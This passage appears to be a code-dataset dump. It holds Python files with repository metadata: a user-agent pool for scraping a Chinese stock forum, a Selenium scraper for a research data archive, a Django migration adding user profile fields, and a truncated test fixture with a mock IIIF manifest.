| 0.00657
| 0
| 0.107143
| 1
| 0
| 0.042635
| 0.010879
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008929
| 0
| 0.044643
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8b03123dd56f83f663c582008405437e8cf918a
| 9,964
|
py
|
Python
|
guba/guba/user_agent_pool.py
|
LuWinter/GubaSpider
|
d460fb0e4d90d0ae362a6481eed4860fb915dfe4
|
[
"MIT"
] | 3
|
2021-08-20T02:54:30.000Z
|
2022-02-15T03:05:19.000Z
|
guba/guba/user_agent_pool.py
|
LuWinter/GubaSpider
|
d460fb0e4d90d0ae362a6481eed4860fb915dfe4
|
[
"MIT"
] | 2
|
2021-08-20T02:42:51.000Z
|
2022-02-10T13:11:17.000Z
|
guba/guba/user_agent_pool.py
|
LuWinter/GubaSpider
|
d460fb0e4d90d0ae362a6481eed4860fb915dfe4
|
[
"MIT"
] | 1
|
2021-08-20T02:54:34.000Z
|
2021-08-20T02:54:34.000Z
|
UA = ["Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
"Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 7.1; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; AskTB5.5)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; FDM; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; Tablet PC 2.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; MS-RTC LM 8; Zune 4.7)",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre",
"Mozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20100101 Firefox/4.0b12pre"]
request_form_data = {
'param': 'postid=1025461213&sort=1&sorttype=1&p=1&ps=30',
'path': 'reply/api/Reply/ArticleNewReplyList',
'env': '2'
}
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74",
'Origin': 'https://guba.eastmoney.com',
'Referer': 'https://guba.eastmoney.com/list,002074.html',
'Host': 'guba.eastmoney.com'
}
| 110.711111
| 230
| 0.680349
| 2,099
| 9,964
| 3.225822
| 0.091949
| 0.083296
| 0.088613
| 0.073106
| 0.811549
| 0.793827
| 0.761187
| 0.74184
| 0.695909
| 0.654704
| 0
| 0.231017
| 0.128964
| 9,964
| 89
| 231
| 111.955056
| 0.549142
| 0
| 0
| 0.022989
| 0
| 0.885057
| 0.953834
| 0.019671
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d8ba1dd280a83651a46ea4ebb96df7c587dfa91d
| 8,871
|
py
|
Python
|
SearchEngine.py
|
RELIANCE-EOSC/UPM-Massive-ROs-Creator
|
2110a853bd2360efed9ee7f0b9691f66935519f5
|
[
"Apache-2.0"
] | 1
|
2022-01-18T17:58:05.000Z
|
2022-01-18T17:58:05.000Z
|
SearchEngine.py
|
oeg-upm/Massive-ROs-Creator
|
2110a853bd2360efed9ee7f0b9691f66935519f5
|
[
"Apache-2.0"
] | null | null | null |
SearchEngine.py
|
oeg-upm/Massive-ROs-Creator
|
2110a853bd2360efed9ee7f0b9691f66935519f5
|
[
"Apache-2.0"
] | null | null | null |
import json
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import time
domain = ""
field = ""
subfield = ""
description_keywords = []
categories = ["Experiment", "Observation", "Model", "Simulation", "Software", "Image"]
PATH = r'C:\Users\Geo\Downloads\chromedriver_win32\chromedriver.exe'
driver = webdriver.Chrome(PATH)
link = "https://archive.sigma2.no/pages/public/search.jsf"
driver.get(link)
time.sleep(1)
advanced_search = driver.find_element_by_id("searchForm:j_idt59:header:inactive")
advanced_search.click()
time.sleep(1)
#driver.get(link)
#Add domain
if (not domain==""):
domain_menu = Select(driver.find_element_by_id("searchForm:domainMenu"))
domain_menu.select_by_visible_text(domain)
time.sleep(0.5)
#Add field
if (not field==""):
field_menu = Select(driver.find_element_by_id("searchForm:fieldMenu"))
field_menu.select_by_visible_text(field)
time.sleep(0.5)
#Add subfield
if (not subfield==""):
subfield_menu = Select(driver.find_element_by_id("searchForm:subfieldMenu"))
subfield_menu.select_by_visible_text(subfield)
list_of_ids = {}
#Add description
if (not len(description_keywords)==0):
for description in description_keywords:
for category in categories:
driver.get(link)
time.sleep(1)
description_input = driver.find_element_by_name("searchForm:j_idt86")
description_input.clear()
description_input.send_keys(description)
category_menu = Select(driver.find_element_by_xpath("""//*[@id="searchForm:categoryMenu"]"""))
category_menu.select_by_visible_text(category)
#excute query
search_button = driver.find_element_by_name("searchForm:j_idt318").click()
list_per_category = []
#scrape list
try:
content = driver.find_element_by_id("searchresult-section")
list_of_content = content.find_elements_by_class_name("rf-edt-c-cnt")
except:
NoSuchElementException: print ("There is no results for your search for "+description+ " in "+category)
continue
for i in range (0, len(list_of_content),5):
list_of_content[i] = list_of_content[i].get_attribute("innerHTML")
list_of_content[i+2] = list_of_content[i+2].get_attribute("innerHTML")
list_of_content[i] = list_of_content[i][list_of_content[i].find(""";">""")+3:list_of_content[i].find(""";">""")+22]
list_of_content[i+2] = list_of_content[i+2][list_of_content[i+2].find(""";">""")+3:list_of_content[i+2].find("""</a>""")]
new_ro = {"id":list_of_content[i],"title":list_of_content[i+2]}
#print (list_of_content[i])
already_exists = False
for cat in categories:
if cat in list_of_ids and new_ro in list_of_ids[cat]:
already_exists = True
if not already_exists:
list_per_category.append(new_ro)
page_counter = 2
while (1):
time.sleep(1)
try:
next_page = driver.find_element_by_id ("searchResultForm:j_idt61_ds_"+str(page_counter)).click()
time.sleep(1)
#print("breakpoint 1")
content = driver.find_element_by_id("searchresult-section")
list_of_content = content.find_elements_by_class_name("rf-edt-c-cnt")
#print ("este es "+list_of_content[2].get_attribute("innerHTML"))
for i in range (0, len(list_of_content),5):
list_of_content[i] = list_of_content[i].get_attribute("innerHTML")
list_of_content[i+2] = list_of_content[i+2].get_attribute("innerHTML")
list_of_content[i] = list_of_content[i][list_of_content[i].find(""";">""")+3:list_of_content[i].find(""";">""")+22]
list_of_content[i+2] = list_of_content[i+2][list_of_content[i+2].find(""";">""")+3:list_of_content[i+2].find("""</a>""")]
#print (list_of_content[i+2])
#print (list_of_content[i])
new_ro = {"id":list_of_content[i],"title":list_of_content[i+2]}
#print (list_of_content[i])
already_exists = False
for cat in categories:
if cat in list_of_ids and new_ro in list_of_ids[cat]:
already_exists = True
if not already_exists:
list_per_category.append(new_ro)
page_counter+=1
#print ("este es "+list_of_content[2])
except:
NoSuchElementException: print ("Please wait while the webpage is being scraped...")
if category in list_of_ids.keys():
for resource in list_per_category:
if not resource in list_of_ids.get(category):
list_of_ids.get(category).append(resource)
else:
list_of_ids[category]=list_per_category
break
else:
for category in categories:
driver.get(link)
time.sleep(1)
category_menu = Select(driver.find_element_by_xpath("""//*[@id="searchForm:categoryMenu"]"""))
category_menu.select_by_visible_text(category)
#excute query
search_button = driver.find_element_by_name("searchForm:j_idt318").click()
list_per_category = []
#scrape list
try:
content = driver.find_element_by_id("searchresult-section")
list_of_content = content.find_elements_by_class_name("rf-edt-c-cnt")
except:
NoSuchElementException: print ("There is no results for your search in " +category+". Please modify your enteries and try again")
continue
for i in range (0, len(list_of_content),5):
list_of_content[i] = list_of_content[i].get_attribute("innerHTML")
list_of_content[i+2] = list_of_content[i+2].get_attribute("innerHTML")
list_of_content[i] = list_of_content[i][list_of_content[i].find(""";">""")+3:list_of_content[i].find(""";">""")+22]
list_of_content[i+2] = list_of_content[i+2][list_of_content[i+2].find(""";">""")+3:list_of_content[i+2].find("""</a>""")]
new_ro = {"id":list_of_content[i],"title":list_of_content[i+2]}
#print (list_of_content[i])
already_exists = False
for cat in categories:
if cat in list_of_ids and new_ro in list_of_ids[cat]:
already_exists = True
if not already_exists:
list_per_category.append(new_ro)
page_counter = 2
while (1):
time.sleep(1)
try:
next_page = driver.find_element_by_id ("searchResultForm:j_idt61_ds_"+str(page_counter)).click()
time.sleep(1)
#print("breakpoint 1")
content = driver.find_element_by_id("searchresult-section")
list_of_content = content.find_elements_by_class_name("rf-edt-c-cnt")
#print ("este es "+list_of_content[2].get_attribute("innerHTML"))
for i in range (0, len(list_of_content),5):
list_of_content[i] = list_of_content[i].get_attribute("innerHTML")
list_of_content[i+2] = list_of_content[i+2].get_attribute("innerHTML")
list_of_content[i] = list_of_content[i][list_of_content[i].find(""";">""")+3:list_of_content[i].find(""";">""")+22]
list_of_content[i+2] = list_of_content[i+2][list_of_content[i+2].find(""";">""")+3:list_of_content[i+2].find("""</a>""")]
#print (list_of_content[i+2])
#print (list_of_content[i])
new_ro = {"id":list_of_content[i],"title":list_of_content[i+2]}
#print (list_of_content[i])
already_exists = False
for cat in categories:
if cat in list_of_ids and new_ro in list_of_ids[cat]:
already_exists = True
if not already_exists:
list_per_category.append(new_ro)
page_counter+=1
#print ("este es "+list_of_content[2])
except:
NoSuchElementException: print ("Please wait while the webpage is being scraped...")
if category in list_of_ids.keys():
for resource in list_per_category:
if not resource in list_of_ids.get(category):
list_of_ids.get(category).append(resource)
else:
list_of_ids[category]=list_per_category
break
print(len(list_of_ids.get("Experiment")))
print(len(list_of_ids.get("Image")))
print(len(list_of_ids.get("Model")))
print(len(list_of_ids.get("Observation")))
print(len(list_of_ids.get("Simulation")))
f = open("GIT\Massive-ROs-Creator\ToScrape.json", "w")
f.write(json.dumps(list_of_ids, indent=4, sort_keys=True))
f.close()
driver.quit()
print("Your querey was excuted correctly and information was saved")
exit()
#list_of_content[i].find("</a")
#####################ESTA ES UNA PRUEBA PARA SACAR MÁS DATOS DE LA LISTA######################
#for i in range (0, len(list_of_content)):
# list_of_content[i] = list_of_content[i].get_attribute("innerHTML")
###
### list_of_content[i] = list_of_content[i][list_of_content[i].find(""";">""")+3:list_of_content[i].find("</a")]
###
##for i in range (0, len(list_of_content),5)
# list
#print (list_of_content[0].get_attribute("innerHTML"))
#list_of_content = list_of_content.find_elements_by_tag_name("a")
#selection = domain_menu.find_element_by_link_text("Natural sciences")
#domain_menu = domain_menu.find_element_by_link_text("Not defined")
#domain_menu.send_keys(domain)
#domain_menu.send_keys(Keys.RETURN)
#driver.quit()
| 35.91498
| 133
| 0.701274
| 1,345
| 8,871
| 4.317472
| 0.137546
| 0.114689
| 0.197004
| 0.171173
| 0.784915
| 0.768211
| 0.730153
| 0.713621
| 0.69244
| 0.687618
| 0
| 0.01348
| 0.146996
| 8,871
| 246
| 134
| 36.060976
| 0.753932
| 0.139669
| 0
| 0.721519
| 0
| 0
| 0.14263
| 0.039369
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037975
| 0
| 0.037975
| 0.063291
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8d5d8e7867f3a9b5a4bdf79190859ca3eac6fd1
| 1,516
|
py
|
Python
|
projects_api/migrations/0033_auto_20210112_0136.py
|
sorianos/profile-rest-api
|
453b326cf067a07455772c32050a17c31b5dc71a
|
[
"MIT"
] | null | null | null |
projects_api/migrations/0033_auto_20210112_0136.py
|
sorianos/profile-rest-api
|
453b326cf067a07455772c32050a17c31b5dc71a
|
[
"MIT"
] | 5
|
2021-03-19T11:56:51.000Z
|
2022-02-10T14:08:09.000Z
|
projects_api/migrations/0033_auto_20210112_0136.py
|
sorianos/profile-rest-api
|
453b326cf067a07455772c32050a17c31b5dc71a
|
[
"MIT"
] | 1
|
2020-10-29T17:41:34.000Z
|
2020-10-29T17:41:34.000Z
|
# Generated by Django 2.2 on 2021-01-12 07:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects_api', '0032_user'),
]
operations = [
migrations.AddField(
model_name='user',
name='email',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='information',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='institution',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='name',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='pais',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='password',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='sector',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='user',
name='terms',
field=models.CharField(max_length=255, null=True),
),
]
| 28.074074
| 62
| 0.53628
| 147
| 1,516
| 5.408163
| 0.272109
| 0.181132
| 0.231447
| 0.271698
| 0.754717
| 0.754717
| 0.710692
| 0.710692
| 0.660377
| 0.660377
| 0
| 0.042084
| 0.341689
| 1,516
| 53
| 63
| 28.603774
| 0.754509
| 0.028364
| 0
| 0.680851
| 1
| 0
| 0.07274
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.021277
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8fd800d59ed41b71ba0114e2f46c6e041ffd71b
| 13,178
|
py
|
Python
|
test/fixtures.py
|
kirschbombe/feed_ursus
|
7ac05022b539d80f55de0642d2294eb04ca2384d
|
[
"BSD-3-Clause"
] | 1
|
2019-11-26T00:45:05.000Z
|
2019-11-26T00:45:05.000Z
|
test/fixtures.py
|
kirschbombe/feed_ursus
|
7ac05022b539d80f55de0642d2294eb04ca2384d
|
[
"BSD-3-Clause"
] | 2
|
2019-12-17T20:37:44.000Z
|
2020-03-03T18:50:23.000Z
|
test/fixtures.py
|
kirschbombe/feed_ursus
|
7ac05022b539d80f55de0642d2294eb04ca2384d
|
[
"BSD-3-Clause"
] | 1
|
2020-02-13T23:10:30.000Z
|
2020-02-13T23:10:30.000Z
|
# pylint: disable=all
class MockResponse:
def __init__(self, status_code, json_data):
self.json_data = json_data
self.status_code = status_code
def json(self):
return self.json_data
GOOD_MANIFEST = MockResponse(
200,
{
"@context": "http://iiif.io/api/presentation/2/context.json",
"label": "Sinai Arabic 352. Mimars and Lives of Saints : manuscript, 1200. St. Catherine's Monastery, Sinai, Egypt",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest",
"@type": "sc:Manifest",
"sequences": [
{
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/sequence/normal",
"@type": "sc:Sequence",
"canvases": [
{
"@type": "sc:Canvas",
"label": "Front Board Outside",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"width": 5332,
"height": 7006,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/hm957748",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/hm957748",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fhm957748/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fhm957748",
"profile": "http://iiif.io/api/image/2/level0.json",
},
},
}
],
},
{
"@type": "sc:Canvas",
"label": "f. 001r",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/zw07hs0c",
"width": 5332,
"height": 7008,
"images": [
{
"@type": "oa:Annotation",
"@id": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/annotation/zw07hs0c",
"motivation": "sc:painting",
"on": "http://test-iiif.library.ucla.edu/ark%3A%2F21198%2Fz14b44n8/manifest/canvas/zw07hs0c",
"resource": {
"@id": "https://iiif.sinaimanuscripts.library.ucla.edu/iiif/2/ark%3A%2F21198%2Fz14b44n8%2Fzw07hs0c/full/600,/0/default.jpg",
"@type": "dctypes:Image",
"format": "image/jpeg",
"service": {
"@context": "http://iiif.io/api/image/2/context.json",
